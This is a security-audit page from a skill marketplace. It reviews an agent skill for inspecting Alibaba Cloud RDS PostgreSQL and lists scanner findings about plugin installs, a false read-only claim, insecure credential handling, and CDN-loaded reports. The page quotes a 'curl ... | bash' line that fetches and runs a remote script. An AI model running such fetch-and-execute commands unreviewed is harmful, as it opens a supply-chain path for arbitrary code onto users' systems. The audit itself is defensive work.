ClawHub
Back to skill

Security audit

Alibabacloud Rds Postgresql Inspection

Security checks across malware telemetry and agentic risk

Overview

This skill is mostly an Alibaba Cloud RDS PostgreSQL inspection tool, but it also changes local CLI/plugin state and writes sensitive report data in ways users should review first.

Install only if you are comfortable with the skill running Aliyun CLI commands, installing/updating Aliyun CLI plugins, and writing detailed inspection reports locally. Use a least-privilege read-only RAM identity or temporary credentials, avoid pasting long-lived secrets into commands, protect or delete generated report directories, and be aware that opening the HTML reports may contact a third-party CDN.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Supply ChainUnpinned Dependencies, External Script Fetching, Obfuscated Code
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Output HandlingUnvalidated Output Injection, Cross-Context Output, Unbounded Output
  • Behavioral ASTexec() Call, eval() Call, Dynamic Import
Findings (13)

subprocess module call

Medium
Category
Dangerous Code Execution
Content
print(f'  📦 Install {plugin}...', end=' ', flush=True)
        try:
            # CLI 3.3.16+ Must use the --name argument
            install_result = subprocess.run(
                ['aliyun', 'plugin', 'install', '--name', plugin],
                capture_output=True, text=True, timeout=120
            )
Confidence
86% confidence
Finding
install_result = subprocess.run( ['aliyun', 'plugin', 'install', '--name', plugin], capture_output=True, text=True, timeout=120 )

Intent-Code Divergence

Medium
Confidence
92% confidence
Finding
The document asserts the skill is read-only, but immediately discloses a non-read operation, `das create-storage-analysis-task`, which can create or schedule work in the target environment. This is dangerous because operators may grant access or approve execution under a false assumption of zero side effects, weakening change-control and least-privilege review.

Intent-Code Divergence

Medium
Confidence
90% confidence
Finding
The skill claims a read-only posture but includes logic to install CLI plugins before inspection. That mismatch weakens operator trust boundaries and introduces a supply-chain and arbitrary code execution surface that is not necessary for data collection.

Missing User Warnings

Medium
Confidence
94% confidence
Finding
The guide provides concrete examples for configuring long-lived access keys via command-line flags and environment variables, which can expose secrets through shell history, process listings, CI logs, or persisted local configuration files. Although the document later mentions best practices, the examples normalize insecure credential handling without an immediate warning at the point of use.

Missing User Warnings

Medium
Confidence
96% confidence
Finding
The generated reports and JSON outputs persist sensitive operational data to disk, including instance identifiers, networking metadata, alert history, and truncated SQL from slow logs. In a shared workstation, CI runner, or support environment, these artifacts can expose confidential infrastructure and query information to unauthorized readers.

Missing User Warnings

Low
Confidence
88% confidence
Finding
The per-instance HTML report loads ECharts from a third-party CDN when the report is opened. That causes report viewers to contact an external domain and trust remote JavaScript, which can leak viewing activity and expose users to supply-chain compromise if the CDN content is tampered with.

Missing User Warnings

Low
Confidence
88% confidence
Finding
The summary report also imports third-party JavaScript from a CDN, creating the same privacy and supply-chain risk for anyone opening the file. Because the report contains sensitive infrastructure summaries, external fetches are especially undesirable in an inspection context.

Unrestricted Tool Access

Medium
Category
Excessive Agency
Content
## Usage

**You do not need to run any command manually.** Simply describe the request in natural language.

### Example Prompts
Confidence
78% confidence
Finding
run any command

Unvalidated Output Injection

High
Category
Output Handling
Content
# Fetch the list of installed plugins
    try:
        result = subprocess.run(
            ['aliyun', 'plugin', 'list'],
            capture_output=True, text=True, timeout=30
        )
Confidence
95% confidence
Finding
subprocess.run( ['aliyun', 'plugin', 'list'], capture_output

Unvalidated Output Injection

High
Category
Output Handling
Content
print(f'  📦 Install {plugin}...', end=' ', flush=True)
        try:
            # CLI 3.3.16+ Must use the --name argument
            install_result = subprocess.run(
                ['aliyun', 'plugin', 'install', '--name', plugin],
                capture_output=True, text=True, timeout=120
            )
Confidence
95% confidence
Finding
subprocess.run( ['aliyun', 'plugin', 'install', '--name', plugin], capture_output

Unvalidated Output Injection

High
Category
Output Handling
Content
# Verifying plugin installation
    print('🔍 Verifying plugin installation...', flush=True)
    try:
        result = subprocess.run(
            ['aliyun', 'plugin', 'list'],
            capture_output=True, text=True, timeout=30
        )
Confidence
95% confidence
Finding
subprocess.run( ['aliyun', 'plugin', 'list'], capture_output

Unvalidated Output Injection

High
Category
Output Handling
Content
# Retry loop (handles throttling and timeouts)
    for attempt in range(_CLI_MAX_RETRIES):
        try:
            result = subprocess.run(cmd, capture_output=True, text=True,
                                    timeout=timeout or _CLI_TIMEOUT)
            if result.returncode == 0:
                try:
Confidence
95% confidence
Finding
subprocess.run(cmd, capture_output

External Script Fetching

High
Category
Supply Chain
Content
**Pre-check: Aliyun CLI >= 3.3.3 required**
> Run `aliyun version` to verify the version is >= 3.3.3. If the CLI is missing or outdated,
> run `curl -fsSL https://aliyuncli.alicdn.com/setup.sh | bash` to install or upgrade,
> or follow https://help.aliyun.com/zh/cli/ for installation instructions.

**Pre-check: Aliyun CLI plugin update required**
Confidence
97% confidence
Finding
curl -fsSL https://aliyuncli.alicdn.com/setup.sh | bash

VirusTotal

VirusTotal findings are pending for this skill version.

View on VirusTotal